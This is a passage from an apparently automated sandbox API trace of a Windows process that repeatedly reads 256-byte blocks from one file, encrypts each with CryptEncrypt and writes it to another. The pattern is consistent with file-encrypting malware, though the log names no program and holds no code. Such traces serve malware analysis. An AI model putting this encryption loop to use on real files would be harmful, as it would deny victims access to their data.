pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.322] GetLastError () returned 0x0 [0163.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.323] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.323] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.323] GetLastError () returned 0x0 [0163.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.323] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.323] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.323] GetLastError () returned 0x0 [0163.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.323] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.323] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.323] GetLastError () returned 0x0 [0163.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.323] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.323] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.323] GetLastError () returned 0x0 [0163.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.323] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.323] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.323] GetLastError () returned 0x0 [0163.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.323] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.323] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.323] GetLastError () returned 0x0 [0163.323] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.324] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.324] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.324] GetLastError () returned 0x0 [0163.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.324] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.324] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.324] GetLastError () returned 0x0 [0163.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.324] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.324] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.324] GetLastError () returned 0x0 [0163.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.324] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.324] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.324] GetLastError () returned 0x0 [0163.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.324] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.324] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.324] GetLastError () returned 0x0 [0163.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.324] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.324] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.324] GetLastError () returned 0x0 [0163.324] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.324] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.325] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.325] GetLastError () returned 0x0 [0163.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.325] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.325] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.325] GetLastError () returned 0x0 [0163.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.325] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.325] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.325] GetLastError () returned 0x0 [0163.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.325] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.325] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.325] GetLastError () returned 0x0 [0163.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.325] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.325] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.325] GetLastError () returned 0x0 [0163.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.325] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.325] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.325] GetLastError () returned 0x0 [0163.325] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.325] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.326] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.326] GetLastError () returned 0x0 [0163.326] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.326] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.326] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.326] GetLastError () returned 0x0 [0163.326] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.326] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.326] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.326] GetLastError () returned 0x0 [0163.326] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.326] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.326] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.326] GetLastError () returned 0x0 [0163.326] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.326] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.326] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.326] GetLastError () returned 0x0 [0163.326] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.326] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.326] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.326] GetLastError () returned 0x0 [0163.326] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.326] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.327] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.327] GetLastError () returned 0x0 [0163.327] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.327] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.327] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.327] GetLastError () returned 0x0 [0163.327] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.327] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.327] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.327] GetLastError () returned 0x0 [0163.327] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.327] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.327] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.327] GetLastError () returned 0x0 [0163.327] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.327] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.327] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.327] GetLastError () returned 0x0 [0163.327] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.327] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.327] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.327] GetLastError () returned 0x0 [0163.327] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.327] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.327] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.328] GetLastError () returned 0x0 [0163.328] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.328] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.328] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.328] GetLastError () returned 0x0 [0163.328] 